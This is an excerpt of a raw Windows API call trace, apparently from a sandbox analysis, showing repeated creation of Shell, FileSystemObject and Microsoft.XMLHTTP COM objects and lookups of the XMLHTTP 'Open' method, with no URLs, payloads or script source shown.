	[0521.046] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0521.046] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0521.046] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0521.046] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0521.046] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0521.046] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0521.046] SysStringLen (param_1=0x0) returned 0x0
	[0521.046] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0521.049] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0521.049] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0521.049] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0521.049] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0521.049] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0521.049] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0522.754] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0522.754] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0522.755] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0522.756] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0522.756] SysStringLen (param_1=0x0) returned 0x0
	[0522.756] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0522.756] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0522.756] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7c50) returned 0x0
	[0522.756] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0522.756] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0522.756] ??2@YAPEAX_K@Z () returned 0x62f330
	[0522.756] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0522.756] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0522.756] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0522.757] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7c50) returned 0x0
	[0522.757] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7c50) returned 0x3
	[0522.757] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0522.757] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0522.759] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0522.760] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0522.760] SysStringLen (param_1=0x0) returned 0x0
	[0522.760] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0522.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0522.760] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0522.760] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0522.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0522.760] ??2@YAPEAX_K@Z () returned 0x62f310
	[0522.760] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0522.760] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0522.760] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0522.760] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0522.760] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0522.761] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0522.761] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0522.761] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0522.761] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0522.761] SysStringLen (param_1=0x0) returned 0x0
	[0522.761] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0522.761] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0522.761] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0522.761] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0522.761] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0522.762] ??2@YAPEAX_K@Z () returned 0x62f330
	[0522.762] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f330) 
	[0522.762] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0522.762] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0522.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0522.762] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0522.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0522.762] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0522.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0522.762] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0522.763] SysStringLen (param_1=0x0) returned 0x0
	[0522.763] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0522.763] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0522.763] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7c50) returned 0x0
	[0522.763] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0522.763] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0522.763] ??2@YAPEAX_K@Z () returned 0x62f310
	[0522.763] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0522.763] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0522.763] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0522.763] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7c50) returned 0x0
	[0522.763] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7c50) returned 0x3
	[0522.763] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0522.764] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7c50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0522.764] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7c50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0522.764] longjmp () 
	[0522.764] longjmp () 
	[0522.764] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0522.764] SysStringLen (param_1=0x0) returned 0x0
	[0522.764] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0522.764] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0522.765] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0522.765] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0522.765] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0522.765] ??2@YAPEAX_K@Z () returned 0x62f330
	[0522.765] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0522.765] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0522.765] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0522.765] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0522.765] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0522.765] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0522.765] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0522.765] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0522.766] longjmp () 
	[0522.766] longjmp () 
	[0522.766] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0522.766] SysStringLen (param_1=0x0) returned 0x0
	[0522.766] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0522.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
